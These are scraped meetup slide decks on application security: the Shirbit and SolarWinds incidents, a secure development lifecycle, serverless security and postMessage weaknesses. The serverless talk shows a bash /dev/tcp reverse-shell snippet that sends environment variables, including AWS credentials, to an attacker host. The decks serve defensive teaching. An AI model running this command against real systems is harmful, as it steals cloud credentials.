Recent Cyber Security Attacks in Israel and Worldwide
By Lior Mazor
Agenda
• 'Shirbit' Israeli Insurance Company Security Incident
  • Chain of events
  • Points of Failure – Self Evaluation
• 'SolarWinds' global Incident
  • Incident analysis
  • Correlation – as a corporate and as a vendor
About Myself
Lior Mazor, CISSP, CISM, CDPSE
• Leading and managing the S-SDLC and information product security at Amdocs
• B.Sc. Math & Computer Science
• Over 18 years of cybersecurity experience
• Implementing and promoting information security & cyber awareness in various enterprise organizations across the world
• Building enterprise cyber defense methodologies and 'execution practices'
• Expertise in secure development, code review & application penetration testing
• Certified ISO 27001 Lead Auditor
'Shirbit' – Israeli Insurance Company
Shirbit Insurance Company – Short Facts
• Established officially in 2000; considered one of the small insurance groups in Israel
• ~220 employees, based in Israel
• Won a major Israeli insurance project (2005), hence holds significant personal data
• Security is handled with a "CISO as a service" approach – 2 days a week
• Holds a cyber security insurance policy by AON (no further details are known)
• Used an external MDR service with monitoring abilities only, not working on weekends
Chain Of Events
29/11 – Active Incident in Place
High-level understanding of the incident by the Shirbit company begins
1. Social media accounts on Twitter and Telegram are opened under the name "Black Shadow"
2. Darknet search for "technical writers"

30/11 – Regulation Update
Shirbit notifies the regulators about a potential breach
1. Shirbit takes down (willingly or not) its website and all other internet-connected servers/applications
2. Examples of stolen data are leaked

31/11 – Media Notification
The leak is picked up by the media and published across different media channels
1. Data examples continue to surface outside, signalling the intention and seriousness of the hackers

1-2/12 – IR Kicks In
The company begins its response, from operational to technological and other factors
1. First SMS message is sent to customers about a potential cyber breach
2. The company hires external IR teams and aligns with the government

3-4…/12 – Official Ransom Demand
Black Shadow posts its ransom demand and actively threatens to publish more data
1. Data continues to be published
2. Shirbit doesn't plan to pay the ransom
3. Data is offered for sale on the darknet
4. Shirbit posts an FAQ and additional SMS messages are sent to customers
Partial Facts, Speculation and Assumptions
The details below are taken from OSINT sources (CrowdStrike, ClearSky, general media channels).
The attack didn't happen overnight – in these types of scenarios the attacker had established a foothold over the past 2-4 months, waiting for a trigger or working under the radar to expand that foothold ("living off the land").
What about their security solutions? A very limited ESET AV with no advanced abilities; their DLP software was not configured well.
How were they hacked? From known vulnerabilities never patched on their VPN (Pulse) to security gaps on their OWA (Outlook Web Access) that allowed the injection of a backdoor, and from there direct access to their backup servers.
Hacktivists, a nation-planned attack or cyber criminals – all theories apply. Some state that the group never existed before (no prior knowledge) and is an Iranian/pro-Palestinian retaliation. Some state that during negotiation it seemed to be an Israel-based attack (publication of the infosec policy and the origin from which the Telegram group was opened).
Postmortem Analysis – Points of Failure Self Evaluation!
Phases: Prepare / Detect & Analyze / Contain, Eradicate & Recover / Post-incident activity
Yet to be seen…
1. No official government regulatory statements
2. 4 'class actions' were already filed
3. The company is already "back to business" and issuing new policies
1. To be improved: communication to customers and support (minimal FAQ)
2. Ability to evaluate the magnitude of the breach (media based)
3. Major attempts to "pass the risk" that are not taken lightly by the public
1. The company is still under an active incident
2. Some minor customer notification improvement
Dimensions: People / Process / Tech'
Negotiation leaked; too many stakeholders involved..
'SolarWinds' – IT Management and Monitoring Company
'SolarWinds' – Supply Chain Type of Attack
A different type of attack, not the traditional data leakage or ransomware.
Different actors – this type of attack usually has the characteristics of what is defined as a "nation-state attack", not the traditional type of attack: a carefully planned operation involving aspects of espionage, with a completely different scale and impact.
How didn't they find it? It requires maturity around their code, an understanding of insider threat and overall security controls to learn about the potential anomaly.
How is this happening? A backdoor in the code, masked as a dedicated file or feature; it requires inside and internal access to the CI/CD eco-system.
Look for the weakest link & major footprint – supply chain attacks are different; they aim to gain a major footprint via a weak point. Any type of company that can fall under this category can be targeted.
SolarWinds – SUPPLY CHAIN Based Attack
• Sophisticated way of attack
• Almost impossible to detect (if at all)
• The attackers inserted malicious code into a DLL
• SolarWinds Orion Platform installed
• The backdoor activates randomly between 12 to 14 days after installation
• Attackers ping the backdoor
• Gathering and sending info
• The backdoor runs commands from the attackers
What can prevent SolarWinds type of attacks?
• As a Corporate:
  • Perform SDL (Security Development Lifecycle) and change management processes
  • Map the "supply chain" and the most valuable assets
  • Remove default credentials from the vendor installation playbook
  • Ensure conditional access to valuable assets
  • Enable anomaly detection systems
  • Control and audit privileged accounts
• As a Vendor:
  • Perform SDL (Security Development Lifecycle) and change management processes
  • Secure the development eco-system (CI/CD)
  • Digitally sign artifacts (yes, still do it)
  • Peer internal review by R&D
  • Secure the overall corporate environment against rogue actors (corporate accountability)
Questions?
How can you deliver a secure product?
Michael Furman, Security Architect
The Legend of SDL
● Steve Lipner
  – Senior Director of Security Engineering Strategy for Microsoft
  – Key person for the Microsoft SDL
What will we cover today?
What is an SDL?
Why is an SDL important?
Sample: Tufin SDL
How can you deliver a secure product?
About Me
● >12 years in application security
● >8 years with Tufin – Lead Security Architect
● >20 years in software engineering
● www.linkedin.com/in/furmanmichael/
● ultimatesecpro@gmail.com
● Read my blog
https://ultimatesecurity.pro/tags/presentation/
● Follow me on twitter @ultimatesecpro
● I like to travel, read books and listen to music
About Tufin
● Market leader in Security Policy Automation
● Tufin is used by >2000 enterprises
  – To segment networks and connect applications
  – On-prem networks, firewalls, cloud and K8S
● We are the Security Policy Company!
Journey to our SDL
● Resolving security issues? Easy for me!
● Creating a "security" process? Brand new for me!
● Soooo many things to manage ....
  – Vulnerabilities discovered by customers
  – CVEs
  – Upgrading 3rd-party software
  – Pen tests
  – ... and all the other stuff I did not yet even know about
● Saved by the SDL!
● No need to reinvent the wheel
Picture is from the "Journey to the Center of the Earth" movie.
What is an SDL?
SDL = Security Development Lifecycle
● SDL is the process for developing secure software
● Adds security controls in each development phase
History of SDL
● Mail from Bill Gates
  – From: Bill Gates
  – To: every full-time employee at Microsoft
  – Sent: Tuesday, January 15, 2002 5:22 PM
  – Subject: Trustworthy computing
● Microsoft shut down Windows development to handle the security issues
● Microsoft SDL
  – v 1.0 - 2004 (internal)
  – v 3.2 - 2008 (public)
  – v 5.2 - 2012 (recent)
…
"Security: The data our software and services store on behalf of our customers should be protected from harm and used or modified only in appropriate ways. Security models should be easy for developers to understand and build into their applications."
Why is an SDL important?
Why SDL?
• Helps developers build secure software
• Ensures security is enabled out of the box
• Defines how to respond to discovered vulnerabilities
Software Development Life Cycle (SDLC)
Requirements → Design → Implementation → Verification → Release
SDL - Shift Left
Requirements → Design → Implementation → Verification → Release: security activities start at Requirements and Design, not only at Verification and Release
Tufin SDL
Training → Requirements → Design → Implementation → Verification → Release → Response
• Training: Security Classroom Sessions, Security Champions
• Requirements: Security Requirements
• Design: Security Design
• Implementation: SAST, Software Updates, Peer Reviews
• Verification / Release: Internal Security Scans, DAST, External Security Tests
• Response: Vulnerability Response Policy
Security Training
● Security awareness training for the Development and QA teams
  – The latest security threats, mitigations, and technologies
  – OWASP Top 10 best practices
● Security Champions
Security Training
● Q: How can a Security Champion be successful?
● Tip: Identify and resolve specific security issues
● Examples of investigations:
  – Best way for us to handle Content Security Policy (CSP)?
  – Best way for us to prevent XML External Entity (XXE) attacks?
● Tufin success: OWASP meetup lecture https://ultimatesecurity.pro/post/xxe-meetup/
Security Requirements
● Incorporated into the requirements stage of S/W development
● Why do we want to handle security early?
  – Allows us to design a feature and to write test plans which incorporate security requirements up front
  – Saves time for all of us – developer time, QA time, documentation time
Design
● Designs of new features are done jointly by both the development and security teams
Security Requirements & Design
● Q: How can you ensure Dev & QA handle security?
● Tip: Make it easy - create a security checklist
● Examples
  – New API?
    • Make sure the API has proper authentication
    • Make sure the API has proper authorization
    • Implement input validation
  – Confidential info not stored as plain text
    • Use appropriate encryption or hash algorithms
  – Confidential info not stored on the client side
  – Confidential info not sent via the HTTP GET method
  – …
Static Application Security Testing (SAST)
● What is SAST?
● Q: Any benefit to scanning on each commit?
● Tip: Scan at least weekly
  – Daily is the best option
● Your goal: Fix High issues immediately!
Software Updates
● All 3rd-party software is regularly updated
● Q: Can I ensure all 3rd-party software is kept up-to-date without a tool?
  – Open-source 3rd-party software
  – Commercial 3rd-party software
● Tip: check that recommended upgrades don't introduce new vulnerabilities
● Your goal: upgrade to a version without High or Critical issues!
Peer Reviews
● Mandatory for every code change
● Tip: ensure all code changes adhere to the security requirements
  – Passwords are not stored in plain text
  – Passwords are not stored on the client side
  – …
Internal Security Scans
● What are Internal Security Scans?
● Q: Any benefit to scanning on each commit?
● Tip: Scan at least monthly
  – Depends on your release cycle
● Your goal: Fix High issues immediately!
Internal Security Scans
● Qualys SSL Labs Report – free service https://www.ssllabs.com/ssltest/
● Tip: Ensure you check the "Do not show the results on the boards" checkbox
Dynamic Application Security Testing (DAST)
● What is DAST?
● Q: Any benefit to scanning on each commit?
● Tip: Scan at least monthly
  – Depends on your release cycle
● Your goal: Fix High issues immediately!
External Security Tests
● Why External Security Tests?
● Tips:
  – Scan at least annually
    • Best: each major release
  – Ensure you create a valid test scope that covers all areas
    • WebApp
    • Infra
  – Ensure an External Test is added to the R&D calendar
● Your goal: fix High issues immediately!
  – Coordinate a retest after your fixes
Vulnerability Response Policy
• CRITICAL – A patch will be made available as soon as possible
• HIGH – A fix will be included in the upcoming release
• MEDIUM – A fix will be included in a future release
• LOW – A fix may be included in a future release
• NOT VULNERABLE – Nothing to fix
Vulnerability Response Policy
● Define a vulnerability response policy
  – Document it
● Tip: the policy should be approved at the corporate level
  – It affects sales, support and development
Rolling out an SDL
● First phase (minimal SDL)
  – Vulnerability Response Policy
  – Internal Security Scans
    • Qualys SSL Labs Report
  – Software Updates
    • Using a tool
● Second phase
  – External Security Tests
● Third phase
  – SAST
● Fourth phase
  – DAST
Rolling out an SDL
● Ongoing
  – Security Requirements & Design
  – Security Training
  – Security Champions
  – Peer Reviews
● Further improvements
  – https://www.microsoft.com/en-us/securityengineering/sdl/practices
  – …
Selecting a tool for any SDL phase
● Perform a POC
  – Define requirements very well before the POC
● Tools can be commercial or open source
● Tools from the same provider are not essential
How can you deliver a secure product?
● Start to roll out an SDL in your organization
● Improve SDL on a regular basis
Takeaways
SDL - the framework that ensures secure
software
Roll out an SDL
... And follow it!!!
You will deliver a secure product!
Thank You
Questions?
Contact me
www.linkedin.com/in/furmanmichael/
ultimatesecpro@gmail.com
https://ultimatesecurity.pro/
@ultimatesecpro
Serverless Security
Yossi Shenhav
About Me
Name: Yossi Shenhav
Experience: CEO, Komodo Consulting
Projects: ctf.komodosec.com, www.hacktale.com, Spotlight.komodosec.com
Why Serverless?
Scalable / Cost / Focus on code
What is Serverless Architecture?
Not permanent / Event driven / Isolated
Serverless Web Application – Security Advantages?
So long, webshell
What about reverse shell?
Code Execution Vulnerability
XXE / Unsafe deserialization / Unsafe file opening / Unsafe use of eval / Vulnerable libraries
Depends on the timeout for our execution – the default AWS setting is 3 seconds
How about SSRF?
No luck – we cannot access instance metadata :(
Is it a dead end?
Application-layer vulnerabilities (bad code): SQL injection, authorization, authentication, XSS and more
Reverse shell in our lab
We want the environment variables
Environment variables example
Please send your environment variables to us:
# open a TCP socket to the listener on fd 3, then write the environment to it
exec 3<>/dev/tcp/<IP Address>/<port>
echo "$(printenv)" 1>&3 "$(cat <&3)"
Now we have AWS credentials
Conclusion
Application-level vulnerabilities are here to stay – write secure code
Misconfiguration of permissions in a serverless application may result in attackers taking over the entire cloud environment
Serverless architecture provides improved security over traditional web architecture
THANK YOU
QUESTIONS?
Exploiting cross-document messaging
Application Security Virtual Meetup 2021
Enso.security
Agenda
Cross-document messaging
Threat and attack models
The missing tool
Example
Takeaways
Chen Gour-Arie, Chief Architect, Enso Security
Lives in Tel Aviv, Israel
Has been breaking & building all sorts of applications since 2004
Cross document messaging
Window to window communication channel
No network. Everything happens in the browser's memory
Simple security model
"The Window interface represents a window containing a DOM document; the document property points to the DOM document loaded in that window."
Functional Flow
Any window in the document hierarchy can send a message to any other document.
The "message" event will be triggered on the receiving window.
Sender script (in the sender document / sender window) → Receiver window → Receiver document → Receiver script
Security Model
Sender code: must specify the remote origin* (* wildcards can be used)
Receiver code: received messages include info about the sender origin; the developer must authorize the call
Receiver window: origin settings can tell a window not to load in risky scenarios – Cross-Origin-Opener-Policy**, Cross-Origin-Embedder-Policy**, X-Frame-Options (** limited browser support)
Guided usage
Threat and attack models
Cross-document messaging: STRIDE
Sender script → Sender document → window → Receiver document → Receiver script
Spoofing: senders aren't who we think they are.
Spoofing: the recipients aren't who we think they are.
Denial of Service
Elevation of Privileges
Tampering
Information Disclosure
Cross-document messaging: Attack Model 1
Malicious sender window / sender script → receiver window / receiver document / receiver script
Weakness: the window may not restrict its opener.
Weakness: developers can send unrestrictedly.
Cross-document messaging: Attack Model 2
Sender document / sender script → receiver window / receiver script (sender window malicious)
Weakness: the window may not restrict its opener.
Weakness: developers may skip the authorization check.
A malicious page opens the victim page and sends messages to it.
The missing tool
Should be able to:
Find senders
Find receivers
Simulate a malicious sender
Simulate a malicious receiver
Posta – open source tool at benso.io
Exploit.
Conclusion
Cross document messaging weaknesses are:
● By default, windows can send data to each other.
● On the receiver script, there is no default authorization check.
● Sender scripts can publish data without restrictively choosing the recipient.
To avoid these, we must spot implementations and test them!
Conclusion – for engineers
Safe use of cross document messaging:
● Use XFO/Cross-Origin policies to avoid talking to unwanted origins.
● Send to explicit targets only, as in postMessage(message, [explicit target origin]).
● When handling messages, always check event.origin, but beware of regex bypass techniques.
To avoid these, we must spot implementations and test them!
Research is always better with friends!
Omer Yaron, Wix.com
Barak Tawily, CTO, Enso Security
Enso Application Security Posture Management
Discover – Autonomous application asset discovery
Calibrate – Correlate data about assets and their application security controls, backlogs, teams, projects and technology, to measure risk posture
Manage – Rule-based policy to continuously prescribe requirements, adaptive controls and benchmarks to assets
Thank you!
Questions?
To be continued…

Improve Cybersecurity posture by using ISO/IEC 27032Improve Cybersecurity posture by using ISO/IEC 27032
Improve Cybersecurity posture by using ISO/IEC 27032
 
Cyber security for Developers
Cyber security for DevelopersCyber security for Developers
Cyber security for Developers
 
Security Solution - IBM Business Connect Qatar Defend your company against cy...
Security Solution - IBM Business Connect Qatar Defend your company against cy...Security Solution - IBM Business Connect Qatar Defend your company against cy...
Security Solution - IBM Business Connect Qatar Defend your company against cy...
 
Presentation defend your company against cyber threats with security solutions
Presentation   defend your company against cyber threats with security solutionsPresentation   defend your company against cyber threats with security solutions
Presentation defend your company against cyber threats with security solutions
 
SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)
 
Trending it security threats in the public sector
Trending it security threats in the public sectorTrending it security threats in the public sector
Trending it security threats in the public sector
 
Topic11
Topic11Topic11
Topic11
 
Cloud Security: A Business-Centric Approach in 12 Steps
Cloud Security: A Business-Centric Approach in 12 StepsCloud Security: A Business-Centric Approach in 12 Steps
Cloud Security: A Business-Centric Approach in 12 Steps
 
SCADA Security Webinar
SCADA Security WebinarSCADA Security Webinar
SCADA Security Webinar
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APT
 
How can you deliver a secure product
How can you deliver a secure productHow can you deliver a secure product
How can you deliver a secure product
 
ISM and its impact on Government Project Delivery
ISM and its impact on Government Project DeliveryISM and its impact on Government Project Delivery
ISM and its impact on Government Project Delivery
 
IBM Cyber Threat Analysis
IBM Cyber Threat AnalysisIBM Cyber Threat Analysis
IBM Cyber Threat Analysis
 
Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...
 
The Challenge of Integrating Security Solutions with CI.pdf
The Challenge of Integrating Security Solutions with CI.pdfThe Challenge of Integrating Security Solutions with CI.pdf
The Challenge of Integrating Security Solutions with CI.pdf
 

More from lior mazor

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
The Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdfThe Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdflior mazor
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...lior mazor
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxlior mazor
 
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptxSecure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptxlior mazor
 
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptxWhy 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptxlior mazor
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdflior mazor
 
The Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptxThe Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptxlior mazor
 
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptxSailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptxlior mazor
 
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxEmphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxlior mazor
 
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptxThe Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptxlior mazor
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119lior mazor
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
 
Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022lior mazor
 
Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...lior mazor
 
User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022lior mazor
 
Securing and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 bSecuring and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 blior mazor
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021lior mazor
 
Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021lior mazor
 
Application security meetup data privacy_27052021
Application security meetup data privacy_27052021Application security meetup data privacy_27052021
Application security meetup data privacy_27052021lior mazor
 

More from lior mazor (20)

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
The Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdfThe Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdf
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptxSecure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
 
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptxWhy 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptx
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
 
The Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptxThe Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptx
 
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptxSailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
 
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxEmphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
 
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptxThe Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022
 
Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...
 
User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022
 
Securing and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 bSecuring and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 b
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021
 
Application security meetup data privacy_27052021
Application security meetup data privacy_27052021Application security meetup data privacy_27052021
Application security meetup data privacy_27052021
 

Recently uploaded

Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
What is Binary Language? Computer Number Systems
What is Binary Language?  Computer Number SystemsWhat is Binary Language?  Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 

Recently uploaded (20)

Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
